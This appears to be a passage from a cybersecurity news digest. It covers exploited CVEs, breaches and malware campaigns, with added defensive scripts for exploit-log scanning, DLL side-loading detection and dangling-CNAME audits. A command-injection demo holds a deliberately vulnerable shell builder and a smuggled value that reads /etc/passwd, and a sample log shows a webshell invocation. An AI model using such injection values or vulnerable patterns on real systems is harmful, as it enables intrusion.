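def is_supported() -> bool:
    return sys.platform == "win32"


def _user32():
    u = ctypes.WinDLL("user32", use_last_error=True)
    u.SetWindowDisplayAffinity.argtypes = [ctypes.c_void_p, ctypes.c_uint32]
    u.SetWindowDisplayAffinity.restype = ctypes.c_int   # BOOL
    u.GetWindowDisplayAffinity.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
    u.GetWindowDisplayAffinity.restype = ctypes.c_int
    return u


def get_affinity(hwnd: int):
    """Current affinity of a window owned by this process, or None off Windows."""
    if not is_supported():
        return None
    value = ctypes.c_uint32(0)
    if not _user32().GetWindowDisplayAffinity(hwnd, ctypes.byref(value)):
        raise ctypes.WinError(ctypes.get_last_error())
    return value.value


def exclude_from_capture(hwnd: int, enable: bool = True):
    """Set the flag, then read it back; returns the affinity now in effect (None off Windows).

    hwnd is assumed to come from the application's own windowing toolkit;
    the call fails for windows belonging to other processes.
    """
    if not is_supported():
        return None
    wanted = WDA_EXCLUDEFROMCAPTURE if enable else WDA_NONE
    if not _user32().SetWindowDisplayAffinity(hwnd, wanted):
        raise ctypes.WinError(ctypes.get_last_error())
    actual = get_affinity(hwnd)
    if actual != wanted:
        raise RuntimeError(f"affinity is {actual:#x}, expected {wanted:#x}")
    return actual


def describe(affinity: int) -> str:
    return {WDA_NONE: "capturable",
            WDA_MONITOR: "monitor only (DRM-style black box in captures)",
            WDA_EXCLUDEFROMCAPTURE: "excluded from capture"}.get(affinity, f"unknown {affinity:#x}")
```

The read-back matters: the call succeeds only for windows the calling process owns, and an application that assumes the flag is in place without checking gives its users a false sense of protection. Offer a setting to turn it off, as Signal does, because the same flag blanks the window for capture-based magnifiers and similar assistive tools.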

The Hacker News@thehackernews.com
Chinese-speaking hackers have exploited a zero-day vulnerability, CVE-2025-0994, in Trimble Cityworks software to breach multiple local governing bodies across the United States. This vulnerability, a remote code execution flaw, has been actively exploited since January 2025 by a threat actor tracked as UAT-6382. The attackers targeted enterprise networks of local governing bodies, conducting reconnaissance and deploying web shells and custom-made malware to maintain long-term access, with a particular interest in systems related to utilities management.
UAT-6382 used a range of tools and techniques. It quickly deployed web shells including AntSword and chinatso/Chopper on the underlying IIS web servers, then brought in Rust-based loaders, tracked as TetraLoader, to deliver Cobalt Strike and VShell and keep persistent access. TetraLoader is built with MaLoader, a malware-building framework written in Simplified Chinese, one of several indicators of the actor's origin. Cisco Talos assesses with high confidence that UAT-6382 is Chinese-speaking, based on tooling, TTPs, hands-on-keyboard activity and victimology, and notes that the indicators of compromise from these intrusions overlap with those listed in Trimble's advisory. CISA added CVE-2025-0994 to its Known Exploited Vulnerabilities (KEV) catalog in February 2025. The campaign shows nation-state actors targeting the line-of-business software that U.S. local governments and utilities depend on.

@www.first.org
References: Metacurity, thecyberexpress.com
Researchers from the U.S. National Institute of Standards and Technology (NIST) and the Cybersecurity and Infrastructure Security Agency (CISA) have collaborated to develop a new security metric designed to better assess the likelihood of vulnerability exploitation. This metric aims to enhance the existing Exploit Prediction Scoring System (EPSS) and CISA's Known Exploited Vulnerabilities (KEV) catalog, providing a more refined approach to identifying vulnerabilities that are at high risk of being exploited in the wild. Peter Mell, formerly of NIST, and Jonathan Spring from CISA are credited with outlining this vulnerability exploit metric.
Detailed in a NIST White Paper titled "Likely Exploited Vulnerabilities," the metric is meant to improve how accurately vulnerabilities are ranked for remediation. EPSS estimates the probability that a vulnerability will be exploited in the next 30 days, and KEV records those known to have been exploited; LEV fills the gap between them by composing a vulnerability's EPSS history into a lower-bound estimate of the probability that it has already been exploited at some point, which organizations can use to focus on the threats most likely to be live. Meanwhile, CISA has added six new entries to the KEV catalog, a reminder that actively exploited flaws should be fixed first. In a related development, Wiz Research has observed in-the-wild exploitation of CVE-2025-4427 and CVE-2025-4428, two recently disclosed vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) that chain into remote code execution, underlining the need to apply security patches promptly.
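The white paper's composition can be made concrete. The function below is an added example following the approach described above, not NIST's reference implementation, and it rests on three assumptions that should be read as such: each EPSS score is the probability of exploitation over the 30 days after its publication date, successive windows are treated as independent, and a final window cut short by the end of the evaluation period is weighted by the fraction of it covered. The EPSS history for the hypothetical CVE is constructed.

```python
"""Compose an EPSS history into a Likely Exploited Vulnerabilities (LEV) score (added example)."""
from bisect import bisect_right
from datetime import date, timedelta

WINDOW_DAYS = 30  # assumption: an EPSS score covers the 30 days after its publication

# Constructed EPSS history for a hypothetical CVE: (publication date, 30-day probability),
# sorted by date.
SAMPLE_EPSS = [
    ("2024-11-01", 0.02),
    ("2024-12-01", 0.05),
    ("2025-01-01", 0.30),
    ("2025-02-01", 0.12),
]


def _as_date(d) -> date:
    return d if isinstance(d, date) else date.fromisoformat(d)


def epss_on(history, day) -> float:
    """Most recent EPSS score published on or before `day` (0.0 if none yet)."""
    day = _as_date(day)
    dates = [_as_date(d) for d, _ in history]
    i = bisect_right(dates, day)
    return history[i - 1][1] if i else 0.0


def lev(history, d0, dn) -> float:
    """Lower bound on P(exploited at least once in [d0, dn]).

    Steps through the period in 30-day windows. The probability of never being
    exploited is the product over windows of (1 - p_i * w_i), where p_i is the
    EPSS score in force at the window start and w_i scales a final partial
    window by the fraction of days it covers (assumption: windows independent).
    """
    d0, dn = _as_date(d0), _as_date(dn)
    if dn < d0:
        raise ValueError("dn must not precede d0")
    p_never = 1.0
    start = d0
    while start <= dn:
        days_covered = min(WINDOW_DAYS, (dn - start).days + 1)
        weight = days_covered / WINDOW_DAYS
        p_never *= 1.0 - epss_on(history, start) * weight
        start += timedelta(days=WINDOW_DAYS)
    return 1.0 - p_never


def composite(epss_now: float, lev_score: float, in_kev: bool) -> float:
    """One prioritization probability: KEV membership is certainty; otherwise the larger of EPSS and LEV."""
    return 1.0 if in_kev else max(epss_now, lev_score)


if __name__ == "__main__":
    score = lev(SAMPLE_EPSS, "2024-11-01", "2025-02-28")
    print(f"LEV={score:.4f}", "composite=", composite(SAMPLE_EPSS[-1][1], score, in_kev=False))
```

A vulnerability whose current EPSS is low can still carry a high LEV if it spent a month near the top of the EPSS distribution last year, which is exactly the case a point-in-time EPSS lookup misses.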

@cyberscoop.com
A 19-year-old college student from Worcester, Massachusetts, Matthew Lane, has agreed to plead guilty to charges related to a massive cyberattack on PowerSchool, a cloud-based education software provider. The cyberattack involved extorting millions of dollars from PowerSchool in exchange for not leaking the personal data of millions of students and teachers. Lane exploited stolen credentials to gain unauthorized access to PowerSchool's networks, leading to the theft of sensitive student and teacher data.
The breach is described as one of the largest single exposures of American schoolchildren's data, affecting roughly 62.4 million students and 9.5 million teachers. According to court documents, Lane first obtained stolen data from a U.S. telecommunications company; when that victim refused to pay a ransom, he allegedly went looking for another company that would, and turned to PowerSchool. The stolen information included Social Security numbers and academic records. Lane will plead guilty to cyber extortion conspiracy, cyber extortion, unauthorized access to protected computers and aggravated identity theft. Authorities have characterized the incident as a serious attack on the economy, one that leaves parents fearful for the safety of their children's data, and it underlines how exposed educational institutions, and the third-party platforms they rely on, are to attacks built on stolen credentials.

The Hacker News@thehackernews.com
A new cybersecurity threat, dubbed Hazy Hawk, has emerged, exploiting misconfigured DNS records to hijack abandoned cloud resources. Since at least December 2023, the threat actor has been using DNS CNAME hijacking to seize control of abandoned cloud endpoints belonging to reputable organizations, including Amazon S3 buckets and Microsoft Azure endpoints. By registering new cloud resources with the same names as the abandoned ones, Hazy Hawk redirects traffic to malicious sites, incorporating these hijacked domains into large-scale scam delivery and traffic distribution systems (TDS). This allows them to distribute scams, fake applications, and malware to unsuspecting users, leveraging the trust associated with the original domains.
Infoblox researchers first spotted Hazy Hawk in February 2025, when the group took over subdomains belonging to the U.S. Centers for Disease Control (CDC). Further investigation showed government agencies around the world, major universities and corporations including Deloitte and PricewaterhouseCoopers among the victims. The technique is simple: using passive DNS data, Hazy Hawk looks for hostnames whose CNAME records point at cloud endpoints that no longer exist, then registers a new cloud resource under the very same name, so the victim's subdomain quietly starts resolving to attacker-controlled content. The attack chains often clone legitimate websites for credibility and obfuscate URLs to hide the final destination, and the hijacked hostnames are then used to serve redirects into scams and malware. What makes the operation dangerous is the borrowed trust: content served from a reputable organization's own subdomain passes reputation-based filters and persuades users who would never click a stranger's link. Organizations should inventory their DNS zones and delete, or repoint, any CNAME that targets a cloud resource they no longer control; decommissioning a bucket, app or endpoint should always include removing the DNS record that pointed at it.
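Hazy Hawk's reconnaissance can be run defensively against one's own zones. The script below is an added example, not Infoblox's tooling: it parses a zone export in the common `name TTL IN CNAME target` form (the sample zone is constructed), classifies each target by cloud provider, and asks a probe whether the target still exists. The probe is injected so the example runs offline; in production it would resolve the name, since NXDOMAIN is the dangling signal for Azure-style hosts, or fetch it over HTTP for S3, because a deleted bucket's hostname still resolves and answers NoSuchBucket.

```python
"""Find CNAME records pointing at cloud endpoints nobody controls any more (added example)."""
import re

# Provider classification by target suffix (extend as needed).
PROVIDER_PATTERNS = [
    ("aws-s3", re.compile(r"\.s3([.-][a-z0-9-]+)?\.amazonaws\.com\.?$")),
    ("aws-cloudfront", re.compile(r"\.cloudfront\.net\.?$")),
    ("azure-app-service", re.compile(r"\.azurewebsites\.net\.?$")),
    ("azure-blob", re.compile(r"\.blob\.core\.windows\.net\.?$")),
    ("azure-traffic-manager", re.compile(r"\.trafficmanager\.net\.?$")),
    ("azure-cloudapp", re.compile(r"\.cloudapp\.(azure\.com|net)\.?$")),
    ("azure-front-door", re.compile(r"\.azurefd\.net\.?$")),
    ("github-pages", re.compile(r"\.github\.io\.?$")),
]

# Constructed zone fragment; names are placeholders.
SAMPLE_ZONE = """\
; constructed zone fragment
www.example.gov.        300 IN A     192.0.2.10
media.example.gov.      300 IN CNAME old-media-assets.s3.amazonaws.com.
portal.example.gov.     300 IN CNAME retired-portal.azurewebsites.net.
docs.example.gov.       300 IN CNAME current-docs.azurewebsites.net.
mail.example.gov.       300 IN CNAME mail.example.gov.mail.protection.outlook.com.
"""

# Constructed probe results: what a resolver / HTTP check would have returned.
SAMPLE_PROBE_RESULTS = {
    "old-media-assets.s3.amazonaws.com": "NoSuchBucket",   # DNS resolves, bucket is gone
    "retired-portal.azurewebsites.net": "NXDOMAIN",        # name no longer exists
    "current-docs.azurewebsites.net": "OK",
}


def parse_cnames(zone_text: str):
    """Yield (owner, target) for each CNAME record in a zone export, comments stripped."""
    for line in zone_text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) >= 4 and fields[-2].upper() == "CNAME":
            yield fields[0].rstrip(".").lower(), fields[-1].rstrip(".").lower()


def provider_of(target: str):
    for name, pattern in PROVIDER_PATTERNS:
        if pattern.search(target):
            return name
    return None


def find_dangling(zone_text: str, probe) -> list:
    """probe(target, provider) -> status; 'NXDOMAIN' and 'NoSuchBucket' both mean dangling."""
    dangling = []
    for owner, target in parse_cnames(zone_text):
        provider = provider_of(target)
        if provider is None:
            continue
        status = probe(target, provider)
        if status in ("NXDOMAIN", "NoSuchBucket"):
            dangling.append({"owner": owner, "target": target, "provider": provider, "status": status})
    return dangling


def sample_probe(target: str, provider: str) -> str:
    """Offline stand-in for the DNS / HTTP probe."""
    return SAMPLE_PROBE_RESULTS.get(target, "OK")


if __name__ == "__main__":
    for rec in find_dangling(SAMPLE_ZONE, sample_probe):
        print(rec)
```

Each record returned is a takeover candidate: fix it by deleting the CNAME, or by re-creating the resource under the same name yourself before someone else does.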

@cloudnativenow.com
Docker, Inc. has unveiled Docker Hardened Images (DHI), a new offering designed to enhance software supply chain security for application development teams. These curated container images are built to be secure, minimal, and production-ready, providing a trusted foundation for developers working across multiple Linux distributions, including Alpine and Debian. DHI aims to address the growing challenges of securing container dependencies by providing enterprise-grade images with built-in security features.
DHI is available directly from Docker Hub. The images run as a non-root user by default, an important limit on what a compromised application can do inside the container. Each image is digitally signed and built to the Supply Chain Levels for Software Artifacts (SLSA) framework defined by Google and the Open Source Security Foundation (OpenSSF); partners including Cloudsmith, GitLab, Grype, JFrog, Microsoft, Neo4j, NGINX, Sonatype, Sysdig and Wiz are also publishing hardened images of their own software. Docker's emphasis is on practicality and on fitting into existing developer workflows, with the stated goal of making supply chain security actionable rather than aspirational. For platform engineers, DHI offers a scalable way to manage secure, compliant base images with control over policy and provenance: every image ships with an SBOM, VEX statements, a digital signature and a SLSA Build Level 3 provenance attestation, so consumers can verify what went into it and how it was built.

@cyberinsider.com
O2 UK has recently patched a security vulnerability in its 4G Calling (VoLTE) and WiFi Calling technologies that could have allowed unauthorized individuals to determine the general location of its mobile users. The flaw stemmed from an improper implementation of the IMS standard, leading to the leakage of user location data through network responses. An attacker could exploit this by simply initiating a phone call to the target, making it a significant privacy concern for O2 UK's nearly 23 million mobile customers. The problem, discovered by security researcher Daniel Williams, is believed to have existed since February 2023 before being resolved.
The O2 flaw lay in its IMS implementation: the signalling exchanged when a call is set up returned data that revealed the called party's approximate location, and the caller did not need the call to be answered to receive it. A separate but related line of research concerns the radio link rather than IMS. Researchers from Beijing University of Posts and Telecommunications and the University of Birmingham showed that VoLTE traffic protected with the EEA2 encryption algorithm gives away more than assumed: the MAC sub-header is not encrypted, so an eavesdropper can read the Logical Channel ID (LCID) of each sub-PDU, single out the VoLTE bearer and recover call metadata such as call times, duration and direction, together with the user's approximate location. O2's prompt fix shows why telecom providers must hold their IMS implementations to stringent standards; proper validation of what signalling responses disclose to the other party is essential to subscriber privacy. As VoLTE and WiFi Calling, with their superior call quality and reliability, become the default way calls are made, regular security audits of the signalling path are what keep user trust and prevent the next leak.

Mandvi@Cyber Security News
Skitnet, also known as Bossnet, is a multi-stage malware that has emerged as a favored tool for ransomware gangs, offering stealth and versatility in cybercrime. First advertised on underground forums like RAMP in April 2024, it has quickly gained traction among notorious groups such as BlackBasta. These groups have leveraged Skitnet's capabilities in phishing attacks targeting enterprise platforms like Microsoft Teams. The malware is attributed to threat actor LARVA-306.
Skitnet employs a layered delivery chain designed to stay off the radar. The initial executable, written in Rust, decrypts an embedded payload compiled in Nim. The Nim binary then opens a reverse shell to the command-and-control (C2) server over DNS, resolving the Windows API functions it needs at runtime rather than listing them in its import table, which blunts static import-based detection. The session begins with randomized DNS queries, giving the operators a channel that blends into ordinary resolver traffic. For persistence Skitnet uses DLL hijacking: a legitimate, signed Asus executable (ISP.exe) is dropped alongside a malicious library (SnxHidLib.DLL) that the executable loads. That DLL launches a PowerShell script (pas.ps1) which loops indefinitely, reporting the machine's C: volume serial number to the C2 and waiting for commands. Skitnet also ships data exfiltration commands and can fetch a .NET loader to stage further payloads, which is what makes it attractive as a post-exploitation tool. Recommended read:
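As an added example (not Skitnet code and not any vendor's detection), the check below turns the persistence technique just described into a hunt over image-load telemetry: a signed vendor binary loading an unsigned DLL that sits beside it in a user-writable directory, with the ISP.exe / SnxHidLib.DLL pairing from the campaign as a named indicator. The records are constructed to resemble the fields of a Sysmon Event ID 7 (ImageLoaded) export; the list of user-writable directories is an assumption of the example, and real telemetry would need the same fields populated by your collector.

```python
"""Added example, not Skitnet code or any vendor detection: flag the DLL
side-loading pattern described above (a signed vendor binary loading a DLL
that sits beside it in a user-writable directory) from image-load telemetry.

Assumptions: the records below are constructed to mimic the fields of a
Sysmon Event ID 7 (ImageLoaded) export; the user-writable directory list is
an assumption; the ISP.exe / SnxHidLib.DLL pairing comes from the Skitnet
description on the page.
"""
from dataclasses import dataclass
import ntpath

USER_WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)
# Known pairing from the campaign: loader process -> hijacked library name.
KNOWN_SIDELOAD_PAIRS = {("isp.exe", "snxhidlib.dll")}


@dataclass(frozen=True)
class ImageLoad:
    image: str           # loading process (full path)
    image_loaded: str    # DLL path
    signed: bool         # Sysmon 'Signed' field for the DLL
    process_signed: bool


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _in_user_writable(path: str) -> bool:
    return _norm(path).startswith(USER_WRITABLE_PREFIXES)


def classify(ev: ImageLoad) -> list[str]:
    """Return the reasons an image-load event looks like side-loading.
    An empty list means the event is benign under these rules."""
    reasons = []
    proc, dll = _norm(ev.image), _norm(ev.image_loaded)
    proc_name, dll_name = ntpath.basename(proc), ntpath.basename(dll)
    # The legitimate Asus pairing also exists, so the name match alone is not
    # enough: require an unsigned library or a suspicious location as well.
    if (proc_name, dll_name) in KNOWN_SIDELOAD_PAIRS and (
            not ev.signed or _in_user_writable(dll)):
        reasons.append("known Skitnet side-load pairing")
    same_dir = ntpath.dirname(proc) == ntpath.dirname(dll)
    if ev.process_signed and not ev.signed and same_dir and _in_user_writable(dll):
        reasons.append("signed process loaded unsigned DLL from its own "
                       "user-writable directory")
    return reasons


def hunt(events):
    """Pair every suspicious event with the rules it tripped."""
    return [(ev, r) for ev in events if (r := classify(ev))]


# Constructed telemetry, not real logs.
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Users\alice\AppData\Roaming\Asus\ISP.exe",
              r"C:\Users\alice\AppData\Roaming\Asus\SnxHidLib.DLL",
              signed=False, process_signed=True),
    ImageLoad(r"C:\Program Files\ASUS\ISP.exe",
              r"C:\Program Files\ASUS\SnxHidLib.DLL",
              signed=True, process_signed=True),
    ImageLoad(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\ntdll.dll",
              signed=True, process_signed=True),
]

if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(ev.image, "->", ev.image_loaded)
        for r in reasons:
            print("   ", r)
```

The second rule is the generalisation worth keeping after this campaign is forgotten: any signed process loading an unsigned library from its own directory under a user-writable path is the side-loading shape, whatever the vendor binary happens to be.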
References :
securebulletin.com@Secure Bulletin
//
Eric Council Jr., a 26-year-old from Alabama, has been sentenced to 14 months in prison for his role in hacking the U.S. Securities and Exchange Commission’s (SEC) X account in January 2024. This breach involved a SIM swap attack, a method where a criminal fraudulently induces a cellular phone carrier to reassign a cellular phone number from a victim’s SIM card to a SIM card controlled by the criminal. Council pleaded guilty in February 2025 to conspiracy charges involving aggravated identity theft and access device fraud, and was sentenced on Friday by Judge Amy Berman Jackson in Washington, D.C.
The hack of the SEC's X account was used to post a false announcement about Bitcoin ETF approvals, which had an immediate and significant impact on the cryptocurrency market. Following the false announcement, the price of Bitcoin increased by more than $1,000 per BTC, but after the SEC regained control and confirmed the announcement as unauthorized, the value of BTC decreased by more than $2,000. Council received $50,000 for his participation in the scheme, which involved using a portable ID card printer to create a fraudulent identification card to impersonate a user of a government phone connected to the SEC’s account on X. In addition to the prison sentence, Council faces further penalties including the forfeiture of $50,000 in Bitcoin proceeds and three years of supervised release with restrictions on dark web access and identity fraud. Prosecutors highlighted Council's post-arrest conduct, which included mocking the SEC's cybersecurity measures. The incident underscores critical vulnerabilities in institutional cybersecurity and highlights the need for stricter carrier verification protocols, especially concerning SIM swap risks, and a move away from over-reliance on SMS-based multi-factor authentication. Recommended read:
References :
Dissent@DataBreaches.Net
//
Coinbase recently disclosed a significant data breach resulting from a bribery scheme targeting overseas customer support agents. The breach, which came to light after a $20 million ransom demand, involved rogue contractors who abused their access to exfiltrate customer data. Coinbase has confirmed that these contractors, located outside the United States, were successfully bribed by cybercriminals to access internal systems and steal sensitive information. Upon discovering the unauthorized activity, Coinbase terminated the involved personnel and initiated a thorough internal investigation.
The compromised data, affecting less than 1% of Coinbase's monthly transacting users, includes names, addresses, phone numbers, email addresses, and the last four digits of Social Security numbers. Additionally, masked bank account numbers, some banking identifiers, government-issued ID images such as driver's licenses and passports, and account data including balance snapshots and transaction histories were exposed. Importantly, Coinbase has stated that no passwords, private keys, or access to customer funds were compromised, and Coinbase Prime accounts and wallets were unaffected. In response to the breach, Coinbase refused to pay the $20 million ransom and instead offered a $20 million reward for information leading to the identification and prosecution of those responsible. The company is also reimbursing customers who mistakenly sent funds to the scammers due to phishing attempts. Furthermore, Coinbase is taking several steps to enhance security, including stricter identity verification, scam-awareness prompts, relocating support functions to a U.S.-based hub, and improving fraud monitoring and insider threat detection capabilities. This incident could potentially cost Coinbase between $180 million and $400 million for remediation and customer reimbursement. Recommended read:
References :
@securebulletin.com
//
China-linked APT groups are actively exploiting a critical vulnerability, CVE-2025-31324, in SAP NetWeaver to breach systems globally. This flaw, an unauthenticated file upload vulnerability, allows for remote code execution, granting unauthorized access to sensitive systems. EclecticIQ assesses with high confidence that these attacks, which commenced in April 2025, are being launched by Chinese nation-state APTs targeting critical infrastructure networks. The scope of the campaign is significant, with evidence indicating the compromise of over 580 SAP NetWeaver instances across various sectors.
Researchers at EclecticIQ uncovered evidence revealing the campaign's breadth. A publicly accessible directory on a threat actor-controlled server contained event logs confirming compromises across 581 SAP NetWeaver instances worldwide. These systems span critical sectors like natural gas distribution networks, water, waste management utilities, medical device manufacturing plants, and government ministries. Additionally, a list of 800 domains running SAP NetWeaver was found, indicating a large pool of potential future targets. The exploitation of CVE-2025-31324 is being attributed to multiple distinct China-linked threat clusters, including CL-STA-0048, UNC5221, and UNC5174. These groups employ various tactics, techniques, and procedures (TTPs), including the use of reverse shells, Rust-based malware loaders like KrustyLoader, and remote access trojans like VShell. In addition to CVE-2025-31324, SAP addressed a second zero-day vulnerability, CVE-2025-42999, which has also been actively exploited in attacks targeting SAP NetWeaver servers and is being used in conjunction with CVE-2025-31324 by threat actors. Recommended read:
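As an added example (not EclecticIQ's or SAP's code), the detection below scans web-server access log lines for the request shape behind the CVE-2025-31324 intrusions described above: an unauthenticated POST to the metadata uploader, followed by the same source invoking a .jsp it could only have placed through that upload. The endpoint path /developmentserver/metadatauploader is the widely reported Visual Composer uploader for this CVE and is an assumption of this example rather than something the page states; the log lines are constructed in a common combined-log style, and the .jsp follow-up is a heuristic that a real deployment would narrow to the actual servlet directories.

```python
"""Added example (not EclecticIQ's or SAP's code): scan access log lines for
the request pattern associated with CVE-2025-31324 exploitation, an
unauthenticated upload that drops a webshell which is then invoked.

Assumptions: /developmentserver/metadatauploader is the widely reported
uploader endpoint for this CVE and is assumed here, not stated on the page;
the log lines are constructed in combined-log style.
"""
import re
from collections import defaultdict

UPLOAD_PATH = "/developmentserver/metadatauploader"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def parse(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_exploit_chains(lines):
    """One finding per client IP that POSTed to the uploader.

    'upload_only'      : a POST to the uploader was seen (exposure + attempt)
    'upload_then_jsp'  : the same IP later requested a .jsp, the stronger
                         signal that a webshell landed and was used
    """
    by_ip = defaultdict(lambda: {"upload": False, "jsp": []})
    for raw in lines:
        rec = parse(raw)
        if not rec:
            continue
        path = rec["path"].lower()
        st = by_ip[rec["ip"]]
        if rec["method"] == "POST" and path.startswith(UPLOAD_PATH):
            st["upload"] = True
        elif st["upload"] and path.split("?")[0].endswith(".jsp"):
            st["jsp"].append(rec["path"])
    findings = {}
    for ip, st in by_ip.items():
        if st["upload"]:
            findings[ip] = "upload_then_jsp" if st["jsp"] else "upload_only"
    return findings


# Constructed log lines; the IPs are documentation ranges, the JSP name is made up.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Apr/2025:03:14:07 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512
203.0.113.7 - - [28/Apr/2025:03:14:09 +0000] "GET /irj/servlet_jsp/irj/root/helper.jsp?cmd=whoami HTTP/1.1" 200 88
198.51.100.9 - - [28/Apr/2025:03:20:00 +0000] "GET /irj/portal HTTP/1.1" 200 4120
192.0.2.5 - - [28/Apr/2025:04:00:00 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    for ip, verdict in find_exploit_chains(SAMPLE_LOG).items():
        print(f"{ip}: {verdict}")
```

Any POST to that path from outside the SAP administration network is worth a ticket on its own, since a patched or properly restricted system should never accept one anonymously; the .jsp follow-up is what separates a scan from a compromise.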
References :
Jessica Lyons@theregister.com
//
Marks & Spencer (M&S) has confirmed that customer data was stolen during a recent cyberattack, with the ransomware group DragonForce claiming responsibility. The retail giant has initiated a mandatory password reset for all customers as a precautionary measure following the breach. The attack, which has shaken the UK retail sector, also affected other major retailers including the Co-operative Group (Co-op) and Harrods.
The stolen data includes customer names, dates of birth, home and email addresses, phone numbers, household information, and online order histories. M&S states that the compromised information does not include usable card or payment details or account passwords. The company is working with external experts to secure its systems and has reported the incident to the relevant government authorities and law enforcement agencies. Early reports linked Scattered Spider to the attack; DragonForce has since claimed responsibility, and the two are not mutually exclusive, since DragonForce is a Ransomware-as-a-Service (RaaS) operation whose affiliates carry out the intrusions. DragonForce is a relatively new group that first framed itself as a pro-Palestinian hacktivist collective before shifting to profit-driven operations. It leases its ransomware to affiliates, who conduct the attacks, with the developers taking a cut of the ransom payments. DragonForce has been targeting high-profile UK retailers, deploying ransomware to encrypt networks, disrupt online orders and payment systems, and threaten the public release of stolen data. Recommended read:
References :
@cyberalerts.io
//
Cybercriminals are exploiting the popularity of AI by distributing the 'Noodlophile' information-stealing malware through fake AI video generation tools. These deceptive websites, often promoted via Facebook groups, lure users with the promise of AI-powered video creation from uploaded files. Instead of delivering the advertised service, the sites serve a malicious ZIP file containing an executable whose name ends in a video extension followed by .exe, such as "Video Dream MachineAI.mp4.exe." The trick relies on Windows' default setting of hiding known file extensions: Explorer shows the file as "Video Dream MachineAI.mp4", so the executable passes for a video.
Upon execution, the malware initiates a multi-stage infection process. The deceptive executable launches a legitimate binary associated with ByteDance's video editor ("CapCut.exe") to run a .NET-based loader. This loader then retrieves a Python payload ("srchost.exe") from a remote server, ultimately leading to the deployment of Noodlophile Stealer. This infostealer is designed to harvest sensitive data, including browser credentials, cryptocurrency wallet information, and other personal data. Morphisec researchers, including Shmuel Uzan, warn that these campaigns are attracting significant attention, with some Facebook posts garnering over 62,000 views. The threat actors behind Noodlophile are believed to be of Vietnamese origin, with the developer's GitHub profile indicating a passion for malware development. The rise of AI-themed lures highlights the growing trend of cybercriminals weaponizing public interest in emerging technologies to spread malware, impacting unsuspecting users seeking AI tools for video and image editing. Recommended read:
References :
@cyberpress.org
//
Critical security vulnerabilities have been discovered in Mitel SIP phones, potentially exposing enterprise communication systems to unauthorized access and control. The flaws impact widely deployed models, including the 6800, 6900, and 6900w Series, as well as the 6970 Conference Unit. These vulnerabilities include a command injection flaw (CVE-2025-47188) and an unauthenticated file upload vulnerability (CVE-2025-47187). Mitel has issued a security advisory, MISA-2025-0004, urging users to update their devices immediately.
Mitel's critical command injection vulnerability (CVE-2025-47188) allows unauthenticated attackers with network access to execute arbitrary commands on affected phones. The flaw stems from insufficient sanitization of parameters within the device’s web management interface. With a CVSS score of 9.8, exploitation of this vulnerability could grant attackers control over the device, enabling them to exfiltrate sensitive data, alter system settings, and disrupt operations. This could also allow attackers to use the compromised device as a foothold to pivot deeper into enterprise networks. The affected devices are Mitel 6800, 6900, and 6900w Series SIP Phones, and the 6970 Conference Unit running firmware version R6.4.0.SP4 or earlier. Mitel recommends upgrading to firmware version R6.4.0.SP5 or newer releases to mitigate these risks. While Mitel suggests keeping SIP phones on protected internal networks, organizations with expansive and poorly segmented networks remain at heightened risk. Recommended read:
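The advisory gives no code, so the snippet below is an added, generic illustration and not Mitel's firmware: a web-management handler of the kind the paragraph describes (an untrusted request parameter reaching a shell command) shown in its vulnerable form beside a hardened one. The 'diagnostic ping' feature, the parameter and the command are invented for the example; the point is the pattern of insufficient parameter sanitisation and the two-step fix, strict validation of the value plus passing it as a discrete argv element rather than through a shell.

```python
"""Added example, not Mitel's firmware code: a generic web-management
handler of the kind the advisory describes, in vulnerable and hardened form.

Assumptions: the 'diagnostic ping' feature, its parameter and the command
are invented for illustration and are not details from the Mitel advisory.
"""
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: labels of alphanumerics and hyphens, no leading or
# trailing hyphen, total length capped.  Nothing a shell cares about can match.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_ping_vulnerable(target: str) -> str:
    """Vulnerable: the request parameter lands verbatim inside a shell string.
    Returned rather than executed so the injection is visible in the result;
    the original sin is that this string would be run with shell=True."""
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    """Hardened, step 1: accept only an IP literal or a DNS hostname.
    Anything else (spaces, ';', '|', '$(' ...) is rejected, not escaped."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("target is not an IP address or hostname")


def build_ping_hardened(target: str) -> list[str]:
    """Hardened, step 2: the validated value becomes one argv element.
    No shell is involved, so metacharacters have no meaning even if the
    validator were ever loosened."""
    return ["ping", "-c", "1", validate_target(target)]


def run_hardened(target: str) -> subprocess.CompletedProcess:
    """Execute the hardened form; shell=False is the default and stays so."""
    return subprocess.run(build_ping_hardened(target),
                          capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    hostile = "10.0.0.1; cat /etc/passwd"
    print("vulnerable builds:", build_ping_vulnerable(hostile))
    try:
        build_ping_hardened(hostile)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print("hardened builds:", build_ping_hardened("phone-gw.example.net"))
```

Validation by allowlist matters more than the argv split on an embedded device, where the tool being invoked may itself accept option-like arguments; rejecting anything that is not syntactically an address or hostname closes that avenue as well.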
References :
@cyberalerts.io
//
